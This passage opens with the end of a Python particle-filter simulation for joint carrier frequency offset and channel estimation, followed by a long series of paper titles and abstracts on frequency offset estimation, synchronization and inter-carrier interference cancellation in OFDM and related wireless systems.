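    h = np.ones(n_part, dtype=complex)              # per-particle channel (Kalman mean)
    P = np.ones(n_part)                             # per-particle channel variance
    logw = np.zeros(n_part)
    for n, (yn, sn) in enumerate(zip(y, pilots)):
        eps = eps + np.sqrt(q_eps) * rng.standard_normal(n_part)   # CFO random walk
        P = P + q_h                                                 # channel prediction
        g = sn * np.exp(2j * np.pi * eps * n / N)   # linear observation gain given eps
        S = np.abs(g) ** 2 * P + r                  # per-particle innovation variance
        innov = yn - g * h
        logw += -np.abs(innov) ** 2 / S - np.log(S) # complex-Gaussian log-likelihood (up to a constant)
        K = P * np.conj(g) / S                      # per-particle Kalman gain
        h = h + K * innov
        P = (1.0 - np.real(K * g)) * P
        w = np.exp(logw - logw.max())
        w /= w.sum()
        if 1.0 / np.sum(w ** 2) < n_part / 2:       # resample when effective size drops
            idx = rng.choice(n_part, n_part, p=w)
            eps, h, P = eps[idx], h[idx], P[idx]
            logw = np.zeros(n_part)
            w = np.full(n_part, 1.0 / n_part)
    return np.sum(w * eps), np.sum(w * h)

rng = np.random.default_rng(4)
N, n_obs = 64, 200
eps_true, h_true = 0.07, 0.9 - 0.4j
pilots = (2 * rng.integers(0, 2, n_obs) - 1).astype(complex)
n_idx = np.arange(n_obs)
y = h_true * pilots * np.exp(2j * np.pi * eps_true * n_idx / N)
y += np.sqrt(0.01 / 2) * (rng.standard_normal(n_obs) + 1j * rng.standard_normal(n_obs))
eps_hat, h_hat = rbpf_cfo_channel(y, pilots, N)
print("eps_hat:", eps_hat, " h_hat:", h_hat)
```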
--- paper_title: A Joint Channel and Frequency Offset Estimator for the Downlink of Coordinated MIMO-OFDM Systems paper_content: The issues of frequency offset and channel estimation are considered for the downlink of coordinated multiple-input multiple-output orthogonal frequency-division multiplexing systems. Multiple carrier frequency offsets exist in this coordinated system. Without implementing an appropriate compensation for these offsets, both inter-carrier and inter-cell interference will degrade the system performance. Here, we adopt a parallel interference cancelation strategy to iteratively mitigate inter-cell interference, and propose a frequency offset estimator, approximated by a Hadamard product and a Taylor series expansion, to eliminate the inter-carrier interference. Our scheme is significantly less complex than existing methods. Furthermore, the proposed channel estimator is robust to frequency offsets and performs comparably well to these conventional approaches. --- paper_title: Joint Frequency Offset Tracking and PAPR Reduction Algorithm in OFDM Systems paper_content: This paper presents an algorithm that aims to reduce the peak-to-average power ratio (PAPR) of orthogonal frequency division multiplexing (OFDM) communication systems while maintaining frequency tracking. The algorithm achieves PAPR reduction by applying the complex conjugates of the data symbol obtained from the frequency domain to cancel the phase of the data symbol. A likelihood estimator is used to obtain the sub-carrier phase error due to the residual carrier frequency offset (RCFO) using the same complex conjugates as a pilot signal. Furthermore, a joint time and frequency domain multicarrier phase locked loop (MPLL) is developed to compensate additional frequency offset. Simulation results show that this algorithm is capable of reducing PAPR without impacting the frequency tracking performance. --- paper_title: General total inter-carrier interference cancellation for OFDM high speed aerial vehicle communication paper_content: Orthogonal Frequency Division Multiplexing (OFDM) has been considered as a strong candidate for next generation high speed aerial vehicle communication systems. However, OFDM systems suffer severe performance degradation due to inter-carrier interference (ICI) in high-mobility channels, if no ICI cancellation is performed. Traditionally, training symbols have been employed in one packet to help the OFDM receiver to estimate the multi-path channel and the carrier frequency offset (CFO) between the transmitter local oscillator and the receiver local oscillator. However, in aerial vehicle communication, the relative transmitter-receiver speed changes so rapidly that it is unreasonable to assume a constant speed (and CFO) during the entire packet transmission. Hence, to accurately estimate the CFO, training symbols need to be transmitted for every OFDM symbol. Obviously, this significantly reduces OFDM throughput while adding complexity due to repeated CFO estimation. In this paper, we extend our previous work to propose a joint channel/CFO estimation and ICI cancellation algorithm. Specifically, in our previous work, we have proposed a total ICI cancellation algorithm using parallel processing for OFDM system which offers excellent ICI cancellation and BER performance. However, in that work, perfect channel information was assumed. In this paper, we combine the channel estimation with the ICI cancellation.
The proposed general total ICI cancellation algorithm has the ability to jointly estimate the carrier frequency offset and channel information, and improve the performance significantly. Meanwhile, a serial processing is proposed to reduce the computation complexity. Simulation results in different scenarios confirm the performance of the proposed scheme in multipath fading channels for high speed aerial vehicle communication. --- paper_title: Low-Complexity Data-Detection Algorithm in Cooperative SFBC-OFDM Systems With Multiple Frequency Offsets paper_content: This paper addresses the problem of data detection in cooperative space-frequency block-coding (SFBC) orthogonal frequency-division multiplexing (OFDM) systems in the presence of multiple carrier frequency offsets (CFOs). A new ordered-successive parallel interference cancellation (OSPIC) detector is proposed. This method consists of first carrying out coarse ordered interference cancellation detection, where the interference components are successively eliminated, and then performing fine interference cancellation detection using parallel interference reduction. Simulation results show that the proposed detector significantly outperforms existing detectors and performs close to that of CFO-free systems for practical signal-to-noise ratios (SNRs). To further reduce the computational complexity, a minimum mean-square error (MMSE)-based reduced-complexity OSPIC (RC-OSPIC) detector is proposed. Compared with the MMSE detector, which requires a full-size complex matrix inversion, the proposed RC-OSPIC detector performs better and is computationally much more effective. --- paper_title: Integer frequency offset estimation by pilot subset selection for OFDM system with CDD paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for an OFDM system using multiple transmit antennas. However, the performance of post-FFT estimation, i.e. the integer frequency offset (IFO), is deteriorated by high frequency selectivity introduced by CDD. Proposed is an IFO estimation scheme for an OFDM system with CDD. Based on the pilot subset partitioning, the proposed IFO estimation scheme reduces the effect of frequency selective fading by adopting the CDD. --- paper_title: A Novel Subspace Decomposition-Based Detection Scheme with Soft Interference Cancellation for OFDMA Uplink paper_content: In this paper we propose a novel subspace decomposition-based detection scheme with the assistance of soft interference cancellation in the uplink of interleaved orthogonal frequency division multiple access (OFDMA) systems. By utilizing the inherent data structure, the interference is first separated from the desired symbol and then further decomposed into the one caused by the residues of decision errors and the other one by the undetected symbols in the successive interference cancellation (SIC) process. With such an ingenious interference decomposition along with the soft processing scheme, the new receiver can render more thorough interference cancellation, which in turn entails enhanced system performance. Moreover, for practical implementations, a low-complexity version, which only deals with the principal components of inter-carrier interference (ICI), is also addressed. Conducted simulations show that the developed receiver and its low-complexity implementation can provide superior performance compared with previous works and are resilient to the presence of carrier-frequency offsets (CFOs).
The low complexity implementation, in particular, requires substantially lower computational overhead with only slight performance loss. --- paper_title: Repeated correlative coding scheme for mitigation of inter-carrier interference in an orthogonal frequency division multiplexing system paper_content: In this study, a repeated correlative coding scheme is proposed to combat the inter-carrier interference (ICI) caused by the frequency offset in orthogonal frequency division multiplexing (OFDM) communication systems. This proposed scheme combine two ideas of the well-known methods, which are the coding of adjacent subcarriers with antipodal of the same data symbol (ICI self-cancellation) and correlative coding. A mathematical expression for the carrier-to-interference ratio (CIR) by using this proposed repeated correlative coding scheme is derived. The simulated result of CIR for the proposed scheme is significantly improved compared to the correlative coding as well as a self-cancellation scheme. The bit-error-rate (BER) of the proposed scheme is also compared with the ICI self-cancellation scheme and correlative coding scheme, which is comparable to that of the ICI self-cancellation scheme and better than the correlative coding scheme. --- paper_title: Concatenated Precoded OFDM for CFO Effect Mitigation paper_content: Orthogonal frequency-division multiplexing (OFDM) is highly sensitive to carrier frequency offset (CFO), which not only causes intercarrier interference (ICI) among subcarriers but introduces complex multiplicative distortion (CMD) to all detected subcarrier symbols as well. Due to unknown CFO, both ICI and CMD are time variant, thus complicating the data demodulation at the receiver. In conjunction with a training-prefixed data frame structure, a concatenated precoder that is constructed by concatenating an outer modified correlative precoder with an inner reduced Hadamard precoder is proposed in this paper to process data symbols prior to OFDM modulation and to enable joint estimation on channel multipath and constant CMD (CCMD), time-variant CMD (TCMD) estimation and compensation, and ICI suppression at the receiver in the presence of CFO. Simulation results show that the proposed system provides much better error performance than conventional signal coding approaches in the presence of CFO and multipath fading. --- paper_title: A Fast Time-Delay Estimator of PN Signals paper_content: This work proposes an effective time-delay estimator for PN satellite signals, exploiting a fast triangular interpolator, running on three estimated ambiguity samples in the neighborhood of the coarse estimate. Performance analysis (theory and simulation) is carried out in comparison with conventional approaches based on the interpolation, usually carried out by (time-consuming) narrow-band over-sampling or (fast) fitting of few samples of a smoothed function of the ambiguity function around its maximum. The theoretical results, substantiated by computer simulations, have evidenced that the devised method outperforms the conventional estimator for all the timing offsets and is well suited for satellite spread-spectrum communications. --- paper_title: CFO estimation in OFDM systems under timing and channel length uncertainties with model averaging paper_content: In this letter, we investigate the problem of CFO estimation in OFDM systems when the timing offset and channel length are not exactly known. 
Instead of explicitly estimating the timing offset and channel length, we employ a multi-model approach, where the timing offset and channel length can take multiple values with certain probabilities. The effect of multimodel is directly incorporated into the CFO estimator. Results show that the proposed estimator outperforms the estimator selecting only the most probable model and the method taking the maximal model. --- paper_title: Repeated preamble based carrier frequency offset estimation in the presence of I/Q imbalance paper_content: The paper proposes a novel estimation of carrier frequency offset (CFO) and I/Q imbalance, based on the popular repeated preamble. By investigating the nonlinear least squares cost function of CFO estimation, we discover a general relation among three arbitrary pilot symbols and derive several useful linear equations. Then, we propose a corresponding linear least squares estimation of unsigned CFO with explicit closed-form solution. Using the tentative CFO estimate, the I/Q imbalance can be estimated with sign ambiguity. Notice that the taps of the FIR filter representing frequency-dependent imbalance in practical frond-ends are constrained, we also propose a novel computation-free detection method to solve the sign ambiguity. --- paper_title: ESPRIT-Based Carrier Frequency Offset Estimation for OFDM Direct-Conversion Receivers paper_content: Over the last years, there has been growing interest in making user terminals more efficient in terms of cost, size, and power consumption. A step forward in this direction is represented by direct-conversion receiver (DCR) architectures, which directly convert the received waveform from the radio frequency (RF) to baseband, thereby avoiding any intermediate frequency (IF) stage. One major issue of DCR devices is the presence of RF impairments, which greatly complicate fundamental receiver functions, including the synchronization task. In this paper we propose a carrier frequency offset (CFO) recovery scheme for OFDM DCRs plagued by frequency-selective In-phase/Quadrature (I/Q) imbalances. Our approach is based on the ESPRIT algorithm and relies on the transmission of a typical OFDM training preamble having a repetitive structure in the time domain. Numerical simulations indicate that the proposed scheme outperforms existing state-of-the-art alternatives at the price of a certain increase of the processing load. --- paper_title: An interference self-cancellation technique for SC-FDMA systems paper_content: A new interference self-cancellation (ISC) method for Single Carrier-FDMA (SC-FDMA) systems is proposed to mitigate the inter-user interference caused by frequency offset or Doppler effect. By transmitting a compensation symbol at the first symbol location in each resource block, the energy leakage can be significantly suppressed. With little bandwidth and power sacrifice, the proposed method can greatly improve the system robustness against frequency offset. Simulation results show that the signal-to-interference ratio (SIR) can be improved by 7 dB on average for the entire system band, and up to 11.7 dB for an individual user. --- paper_title: Joint Channel, Carrier-Frequency-Offset and Noise-Variance Estimation for OFDM Systems Based on Expectation Maximization paper_content: In this paper, a joint channel, carrier-frequency-offset (CFO) and noise-variance estimation scheme is proposed for OFDM systems which is based on Expectation and Maximization (EM) algorithm. 
The channel parameters are estimated using training sequences incorporated at the beginning of each transmission frame. Based on the assumption that the amplitude and CFO of different paths are independent, the received multipath components may be decomposed into $L$ independent data sets of the $L$ resolvable propagation paths. Hence the associated multi-dimensional minimization problem may be decomposed into separate single-dimensional minimization processes, and yet the scheme remains capable of approaching the maximum-likelihood performance at a significantly reduced complexity. --- paper_title: Exact BER analysis of FRFT-OFDM system over frequency selective Rayleigh fading channel with CFO paper_content: The bit error rate expression of the binary phase-shift keying modulation scheme has been derived in a frequency selective fading channel for the fractional Fourier transform (FRFT) based orthogonal frequency-division multiplexing (OFDM) system in the presence of carrier frequency offset (CFO). The performance of the FRFT based OFDM system has been found to be better than FFT-based OFDM at different values of FRFT angle parameter α. --- paper_title: Gabor Division/Spread Spectrum System Is Separable in Time and Frequency Synchronization paper_content: Recently proposed new Time-Domain (TD) synchronization using frequency integration and TD Spread Spectrum (SS) codes has been shown to be robust to frequency offset, that has its dual Frequency-Domain (FD) synchronization using time integration and FD SS codes which is robust to timing offset. Separable Property (SP) is defined for time-frequency synchronization under the condition containing time and frequency deviations to be performed separately and cooperatively. The SP compels us to design phase correction on SS codes and transmitted data. --- paper_title: Sensing orthogonal frequency division multiplexing systems for cognitive radio with cyclic prefix and pilot tones paper_content: The detection of orthogonal frequency division multiplexing (OFDM) for cognitive radio is considered in this paper. A frequency-selective fading channel is considered and the receiving process is modeled with timing and frequency offsets. Firstly, the authors propose a new decision statistic based on time-domain cross-correlation of the cyclic prefix (CP) embedded in OFDM signals. The probability distribution functions (PDFs) of the statistics under both hypotheses of primary signal absence and presence are derived. Estimation of the timing and frequency offset is obtained through the maximum likelihood method and the received signals are modified. Then another new decision statistic based on frequency-domain cross-correlation of the pilot tones (PTs) is proposed whose PDF is also analyzed. Then, through the likelihood ratio test, the authors utilize CP and PT jointly and propose a global test statistic. The theoretical probabilities of false alarm (PFA) and detection are derived, and the theoretical threshold for any given PFA is proposed. The simulation results show that the proposed spectrum-sensing scheme has excellent performance, especially under very low signal-to-noise ratio (SNR). --- paper_title: Widely Linear MVDR Beamformers for Noncircular Signals Based on Time-Averaged Second-Order Noncircularity Coefficient Estimation paper_content: The optimal widely linear (WL) minimum variance distortionless response (MVDR) beamformer, which has a powerful performance for the reception of a noncircular signal, was proposed by Chevalier in 2009.
Nevertheless, in spectrum monitoring or passive listening, the optimal WL MVDR beamformer is hard to implement due to an unknown second-order (SO) noncircularity coefficient. This paper aims at estimating the time-averaged SO noncircularity coefficient of a desired noncircular signal, whose waveform is unknown but whose steering vector is known, in the context of the optimal WL MVDR beamformer. The proposed noncircularity coefficient estimator can process 2N - 1 rectilinear signals at most using an array of N sensors. Moreover, a frequency-shift WL MVDR beamforming algorithm is proposed for a noncircular signal having a nonnull frequency offset or carrier residue, jointly with the estimation of the frequency offset of the rectilinear signal. Due to the inevitable estimation error of the time-averaged SO noncircularity coefficient, a diagonal loading technique is used to enhance the robustness of the optimal WL beamformers. Simulations are shown to verify the effectiveness of the proposed algorithms. --- paper_title: Joint estimation of Carrier and Sampling Frequency Offset, phase noise, IQ Offset and MIMO channel for LTE Advanced UL MIMO paper_content: In LTE Advanced Uplink MIMO the pilot symbols on a subcarrier and OFDM symbol are not transmitted exclusively by one layer. If the pilots are transmitted exclusively, as in LTE Advanced Downlink or Mobile WiMAX, the estimation of Carrier Frequency Offset (CFO) and Sampling Frequency Offset (SFO) can be based on correlating two pilot symbols at different OFDM symbols. In addition, the estimation of CFO / SFO can be performed separately from IQ Offset and channel estimation. In LTE Advanced Uplink (UL) the pilot symbols on a subcarrier and OFDM symbol are transmitted by all layers simultaneously. As the received symbol consists of the sum of all transmitted pilot symbols, the CFO / SFO estimation approaches used for SISO no longer seem applicable. This paper introduces a joint estimation of carrier and sampling frequency offset, phase noise, IQ offset and MIMO channel for LTE Advanced UL MIMO. --- paper_title: E2KF based joint multiple CFOs and channel estimate for MIMO-OFDM systems over high mobility scenarios paper_content: An enhanced extended Kalman filtering (E2KF) algorithm is proposed in this paper to cope with the joint estimation of multiple carrier frequency offsets (CFOs) and time-variant channels for MIMO-OFDM systems over high mobility scenarios. It is shown that the auto-regressive (AR) model not only provides an effective way to capture the dynamics of the channel parameters, which enables the prediction capability in the EKF algorithm, but also suggests a method to incorporate multiple successive pilot symbols for an improved measurement update. --- paper_title: An Improved Frequency Offset Estimation Based on Companion Matrix in Multi-User Uplink Interleaved OFDMA Systems paper_content: In this letter, we consider a multiuser uplink orthogonal frequency-division multiple access (OFDMA) system. To estimate the carrier frequency offset (CFO) efficiently, a modified pilot structure has been proposed to allow sufficient frequency separation between the subcarriers allocated to any two users. The proposed structure can reduce the ambiguity problem caused by the multiple signal classification (MUSIC) based algorithm when a CFO of one user is close to that of a different user. We present a CFO estimation method based on the companion matrix obtained using the received signal from the proposed pilot structure.
Simulation results show that the proposed CFO estimator performs better than the conventional estimator and maintains its performance as the CFO range increases. --- paper_title: Channel Equalization and Symbol Detection for Single-Carrier MIMO Systems in the Presence of Multiple Carrier Frequency Offsets paper_content: A new frequency-domain channel equalization and symbol detection scheme is proposed for multiple-input-multiple-output (MIMO) single-carrier broadband wireless systems in the presence of severely frequency-selective channel fading and multiple unknown carrier-frequency offsets (CFOs). Multiple CFOs cause severe phase distortion in the equalized data for large block lengths and/or constellation sizes, thus yielding poor detection performance. Instead of explicitly estimating the CFOs and then compensating them, the proposed scheme estimates the rotated phases (not frequencies) caused by multiple unknown CFOs and then removes the phase rotations from the equalized data before symbol detection. The estimation accuracy of the phase rotation is improved by utilizing a groupwise method rather than symbol-by-symbol methods. This paper differs from other related work in orthogonal frequency division multiplexing (OFDM) studies in that it can combat multiple CFOs that are time varying within each block. Numerical examples for 4 × 2 and 8 × 4 single-carrier systems with quaternary phase-shift keying (QPSK) and eight-phase-shift keying (8PSK) modulation illustrate the effectiveness of the proposed scheme in terms of scatter plots of constellation, mean square error (MSE), and bit error rate (BER). --- paper_title: Simple Carrier Recovery Approach for RF-Pilot-Assisted PDM-CO-OFDM Systems paper_content: For RF-pilot-assisted PDM-CO-OFDM systems, we propose and demonstrate a carrier recovery method applying a simple moving average filter (MAF) to extract the central RF-pilot for phase noise compensation. Because only two additions per output sample would be required to implement such a MAF, its computational complexity is rather low compared to any other direct-form finite impulse response (FIR) filter. To handle its weak side-lobe attenuation, which would cause the spectrally nearby OFDM signal to interfere with the extracted pilot signal, we further propose using multiple MAFs in cascade to enhance the side-lobe attenuation. We evaluate the performance of a 16-QAM and 40-Gbps PDM-CO-OFDM signal, in terms of the bandwidth tolerance, optical signal to noise ratio (OSNR) tolerance, nonlinear tolerance, linewidth tolerance, and residual carrier frequency offset (RFO) tolerance, with different filters including the simple MAF, cascaded MAFs, and the previously-demonstrated multi-stage decimation and interpolation filter (MDIF). We have found that 1) all the filters exhibit similar performance to the ideal brick-wall filter in terms of noise and nonlinear tolerances, 2) the single MAF exhibits the worst tolerances against linewidth and RFO, and 3) the MDIF has to be carefully designed to enhance its tolerances against both the linewidth and RFO. --- paper_title: Novel Coarse Timing Synchronization Methods in OFDM Systems Using Fourth-Order Statistics paper_content: In this paper, the problem of coarse timing synchronization in orthogonal frequency-division multiplexing (OFDM) systems is investigated, and two new timing metrics with better performance are presented.
The new metrics take advantage of two novel differential normalization functions that are based on the fourth-order statistics and are designed depending on the value of carrier frequency offset (CFO). The proposed timing metrics are theoretically evaluated using two different class separability criteria. It is shown that the new schemes considerably increase the difference between the correct and wrong timing points in comparison with previous methods. The computational complexity of the new methods is obtained, and their superior detection performances are also demonstrated in terms of probabilities of false alarm and missed detection. The results indicate that due to a significant improvement in missed detection probability (MDP), the new methods offer a considerably wider range of acceptable thresholds. --- paper_title: Joint Clock and Frequency Synchronization for OFDM-Based Cellular Systems paper_content: In cellular systems, a basestation and mobile stations need to be synchronized before data exchange. Since the basestation clock reference is more accurate, a mobile station typically derives its clock reference from the basestation. But the carrier frequency offset due to Doppler shift may have harmful effects on the local clock derivation. This letter proposes a joint clock and frequency synchronization technique between a basestation and a mobile station, which is effective even with Doppler shift. We derive the joint estimation algorithm by analyzing the phase and the amplitude distortion caused by the sampling frequency offset and the carrier frequency offset. Simulation results showing the effectiveness of the proposed algorithm will also be presented. --- paper_title: Maximum Likelihood Estimation of Time and Carrier Frequency Offset for DVB-T2 paper_content: The new terrestrial digital video broadcasting standard DVB-T2 provides a specific symbol - called P1-symbol - for the initial time and frequency synchronization. In this paper the maximum likelihood (ML) time and carrier frequency offset (CFO) synchronization scheme, which exploits the structure of the P1 symbol in both time and frequency domains is derived. Two lower-complexity solutions are then proposed: (1) a ML estimator that only exploits the time structure of the P1 symbol and (2) a pseudo ML (PML) scheme that resorts to a suboptimal CFO estimator while still performing ML time synchronization. The proposed schemes are compared in terms of both synchronization capabilities and implementation complexity. The Cramer-Rao bounds for the CFO estimators are also evaluated. Simulation results in a typical DVB-T2 scenario show that both ML and PML schemes have a very close performance while significantly outperforming existing schemes. --- paper_title: An improved ESPRIT-based blind CFO estimation for OFDM in the presence of I/Q imbalance paper_content: The estimation of carrier frequency offset (CFO) is an important issue in the study of OFDM systems. In the past, many CFO estimation methods have been proposed. In particular, the ESPRIT-based blind CFO estimation method is attractive because of its bandwidth efficiency. It can yield accurate estimates and it works for non constant modulus modulation symbols. This paper improves the ESPRIT-based method in two ways. Firstly, we show how the information of virtual carrier location can be exploited to further enhance the estimation accuracy. Secondly, we also derive a new algorithm that can estimate CFO in the presence of I/Q imbalance. 
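Several of the preamble-based schemes listed above (for example, the DVB-T2 P1-symbol estimator and the repeated-preamble and ESPRIT variants) build on the classical idea of reading the fractional CFO from the phase of a correlation between repeated parts of a training symbol. The following minimal NumPy sketch illustrates only that baseline principle; it is not the algorithm of any specific paper in this list, and the function name and arguments are illustrative.

```python
import numpy as np

def cfo_from_repeated_halves(r, N):
    """Fractional CFO from a preamble whose two halves of length N are identical.

    r : complex baseband samples covering the repeated preamble (at least 2N samples)
    N : length of one half of the preamble
    Returns the CFO normalized to the sampling rate (cycles per sample); the
    unambiguous range of this baseline estimator is |eps| < 1/(2N).
    """
    P = np.sum(r[N:2 * N] * np.conj(r[:N]))   # correlate the second half with the first
    return np.angle(P) / (2 * np.pi * N)
```

Integer CFO ambiguities outside this range are what the integer-CFO and full-acquisition-range estimators cited elsewhere in this list are designed to resolve.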
--- paper_title: Data-Aided Timing Synchronization for FM-DCSK UWB Communication Systems paper_content: Frequency-modulated differential chaos shift keying (FM-DCSK) ultrawideband (UWB) communication systems convey information by transmitting ultrashort chaotic pulses (in the nanosecond scale). Since such pulses are ultrashort, timing offset may severely degrade the bit error rate (BER) performance. In this paper, a fast data-aided timing synchronization algorithm with low complexity is proposed for FM-DCSK UWB systems, which capitalizes on the excellent correlation characteristic of chaotic signals. Simulation results show that the BER performance of such systems is fairly close to that of perfect timing thanks to the proposed new algorithm. Moreover, the new algorithm requires less synchronization searching time and lower computational complexity than the conventional one for transmitted reference UWB systems existing in the current literature. --- paper_title: Blind symbol rate estimation using autocorrelation and zero crossing detection paper_content: In this paper we introduce a new and simple method to estimate the symbol rate for single carrier systems of unknown modulation. The introduced technique detects the symbol rate from a continuous range of symbol rates, i.e. it does not assume a finite set of candidate symbol rates. The method does not require any knowledge about system parameters and is therefore totally blind. The method belongs to the family of autocorrelation-based symbol rate estimators, yet, unlike many such schemes, its performance is insensitive to the value of the roll-off factor. We then propose a simple method for frequency offset compensation also based on the autocorrelation function. The proposed estimator is implemented as part of a complete DVB-C [1] receiver and is verified using simulations and results in robust performance even at low SNR and high frequency offsets. --- paper_title: Performance Analysis of Code-Aided Symbol Timing Recovery on AWGN Channels paper_content: We analyze the performance of a code-aided (CA) decision-directed (DD) timing synchronizer, which can exploit the dependence structure across coded symbols to improve the timing recovery accuracy. Due to the inherent coupling between timing recovery and decoding, most existing studies rely on extensive simulation rather than on analytical methods to evaluate performance of timing recovery for coded systems. We propose analytical methods in this paper towards this end. A first key step is to approximate timing-offset-induced inter-symbol interference (ISI) as an additive Gaussian noise, since in the low signal-to-noise ratio (SNR) regime the background noise is large enough to mask the ISI. Then, we derive semi-analytical expressions for the mean and variance of extrinsic information as functions of timing offset, building on which we characterize both open-loop and closed-loop performance of decision-directed timing synchronizers. Monte Carlo simulation results corroborate that the proposed method accurately characterizes the performance of CA DD timing recovery, for systems with a wide range of channel bandwidth and different channel codes. --- paper_title: Intercarrier Interference Cancellation Using General Phase Rotated Conjugate Transmission for OFDM Systems paper_content: In this paper, we propose a general phase rotated conjugate cancellation (PRCC) scheme for intercarrier interference (ICI) cancellation in orthogonal frequency division multiplexing (OFDM) systems. 
It is shown that the previous conjugate cancellation (CC) scheme is equivalent to a special case of our proposed scheme. The general PRCC scheme retains the advantages of the conventional CC scheme, such as backward compatibility with the existing OFDM systems, low receiver complexity, and two-path diversity, but provides better performance, especially in high frequency offset situations. --- paper_title: Improved fine CFO synchronization for MB-OFDM UWB paper_content: Proposed is an improved blind carrier frequency offset (CFO) estimator suitable for the Multi-Band OFDM Ultra Wideband (MB-OFDM UWB) system. By exploiting the conjugate symmetry of the physical layer convergence protocol (PLCP), the need for training symbols can be avoided and the estimation performance is improved as well. Computer simulations show that the proposed method achieves better estimation performance than the existing method. --- paper_title: Schmidl-Cox-like Frequency Offset Estimation in Time-Hopping UWB paper_content: This paper presents a time hopping ultra wide band (TH-UWB) receiver design targeted to high performance and low complexity. The classical Schmidl and Cox idea of extracting the frequency offset from the phase of a correlation measure between two identical transmitted signals is here extended to a TH format. The algorithm exploits the low duty cycle of the time hopping access, and combines received samples in order to strengthen the signal-to-noise ratio. A clever selection of which samples to use in the correlation measure (first and last third of the received signal) is proved to perform 0.5 dB from the Cramer-Rao lower bound, thus providing an improvement of 0.75 dB with respect to the standard approach of the literature (correlating the first and second halves of the received signal). A modified algorithm that suitably weights received samples is also proposed for achieving robustness in impulsive multiple user access scenarios. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for MIMO-OFDM Systems Using Extended H_{∞} Filter paper_content: We address the problem of joint carrier frequency offset (CFO) and channel estimation for multiple-input multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) systems over time-varying channels. The CFOs between different pairs of transmit and receive antennas are considered to be different. The method is derived based on the extended H∞ filter (EHF). Compared to the conventional extended Kalman filter (EKF)-based method, the EHF-based method does not require any knowledge of the noise distributions, so it is more flexible and robust to unknown disturbances. Simulation results are provided to illustrate the performance of this method. --- paper_title: Pilot-aided estimation of carrier frequency offsets and channel impulse responses for OFDM cooperative communications paper_content: We consider a cooperative communication system where the destination node receives an orthogonal frequency-division multiplexing (OFDM) signal transmitted from two relay nodes. We propose and compare two pilot-aided algorithms for the estimation of the carrier frequency offsets (CFOs) and the channel impulse responses (CIRs) associated with the two relay-destination links. The first algorithm uses a basis expansion model (BEM) to estimate a time-varying (TV) multiple-input single-output (MISO) channel that incorporates both CFOs and CIRs effects.
The CFOs are then extracted from the estimated TV-MISO channel by applying estimation of signal parameters via rotational invariance techniques (ESPRIT). The second algorithm exploits the structure of a specific pilot sequence and estimates the CFOs by directly applying ESPRIT on the observed signal. Simulation results show the effectiveness of the proposed algorithms. --- paper_title: A Subspace-Based CFO Estimation Algorithm for General ICI Self-Cancellation Precoded OFDM Systems paper_content: This paper presents a carrier-frequency-offset (CFO) estimation algorithm for time-dispersive orthogonal frequency division multiplexing (OFDM) systems using a general inter-carrier interference (ICI) self-cancellation scheme. This study uses the time shift invariant property in the precoded signal to estimate the CFO. To achieve this, the proposed algorithm first collects the highly correlated receive time samples into snapshot vectors. The snapshot vectors can be expressed in a form having a CFO-directed response structure, which enables the proposed approach to estimate the CFO by using the multiple signal classification (MUSIC) algorithm in the time domain. This study also develops a time sample selection scheme to mitigate the noise enhancement caused in the equalization process before the MUSIC algorithm. As compared to conventional algorithms, in addition to having an estimation error approaching the Cramer-Rao lower bound (CRLB), the proposed algorithm has an adjustable CFO estimation range linearly proportional to the order of the ICI self-cancellation scheme. --- paper_title: A Novel Distributed Translator for an ATSC Terrestrial DTV System paper_content: This paper presents a new design and implementation method of a distributed translator (DTxR), termed the equalization DTxR (EDTxR), for distributed translator networks in ATSC systems. EDTxR has a simple structure and does not require any devices to be added to studio or transmitter facilities already deployed. EDTxRs which retransmit the same transmitter signal can have identical output symbol streams among them without additional synchronization information by utilizing the structure of the equalization digital on-channel repeater (EDOCR). Moreover, they can synchronize output frequency among them without global positioning system (GPS) clock receivers by adopting a crystal oscillator for each translator and compensating the frequency offset of each crystal oscillator through the carrier and timing recovery. To verify the proposed method, multiple EDTxRs are implemented and tested in the laboratory and in the field. Through the tests, it is confirmed that EDTxR is a simple and economic distributed translator for distributed transmission systems which does not need additional synchronization devices. Therefore, EDTxR can be a promising translator for coverage extension of digital terrestrial television broadcasting under spectrum deficient situations. --- paper_title: The Cramer-Rao Bound for Training Sequence Design for Burst-Mode CPM paper_content: In this paper, we study the Cramer-Rao bound (CRB) for continuous phase modulation (CPM) signals where frequency offset, carrier phase, and symbol timing are jointly estimated when transmitted over an additive white Gaussian noise (AWGN) channel. We consider a data-aided (DA) estimation scenario in which the estimator takes advantage of a known training sequence at the start of each burst. Thus, we first derive the joint CRBs as functions of a known training sequence and CPM parameters.
By analyzing the CRB expressions, we propose the optimum training sequence for which the CRB is minimized. We show that the same training sequence is optimum for all three estimation parameters. Additionally, we compare the performance of the optimum training sequence with a random one by providing a closed-form expression for the unconditional CRB (UCRB) for symbol timing estimation of CPM signals. Comparing the UCRB and the CRB for the optimum training sequence reveals that a DA estimator with the optimum training sequence leads to significant gains in terms of the mean-square error of the estimation parameter when the underlying CPM scheme is non-binary and/or partial response. --- paper_title: Integer Frequency Offset Estimation for OFDM Systems With Residual Timing Offset Over Frequency Selective Fading Channels paper_content: Accurate integer frequency offset (IFO) estimation is crucial for orthogonal frequency-division multiplexing (OFDM) systems, particularly in the presence of frequency-selective fading and residual timing offset (RTO). For existing algorithms, however, it is still a challenge to obtain a good tradeoff among the estimation performance, complexity, and spectrum overhead. In this paper, we propose a novel cross ambiguity function (CAF)-based IFO estimator using only one training sequence. By designing the training sequence, which has only a single sharp peak on its ambiguity function surface, a highly accurate and full acquisition range estimation of the IFO can be obtained in the presence of frequency-selective fading and RTO. Moreover, the adoption of the CAF expression in terms of time-domain signals ensures that the complexity of the proposed algorithm is relatively low. Simulation results verify its superior accuracy in frequency-selective fading channels and in the presence of RTO. --- paper_title: Low complexity scheme for carrier frequency offset estimation in orthogonal frequency division multiple access uplink paper_content: Maximum likelihood (ML) carrier-frequency offset estimation for orthogonal frequency-division multiple access uplink is a complex multi-parameter estimation problem. The ML approach is a global optima search problem, which is prohibitive for practical applications because of the requirement of multidimensional exhaustive search for a large number of users. There are a few attempts to reduce the complexity of ML search by applying evolutionary optimisation algorithms. In this study, the authors propose a novel canonical particle swarm optimisation (CPSO)-based scheme, to reduce the computational complexity without compromising the performance and premature convergence. The proposed technique is a two-step process, where, in the first step, low resolution alternating projection frequency estimation (APFE) is used to generate a single better positioned particle for CPSO, followed by an actual CPSO procedure in second step. The mean square error performance of the proposed scheme is compared with existing low complexity algorithms namely APFE and linear particle swarm optimisation with mutation. Simulation results presented in this study show 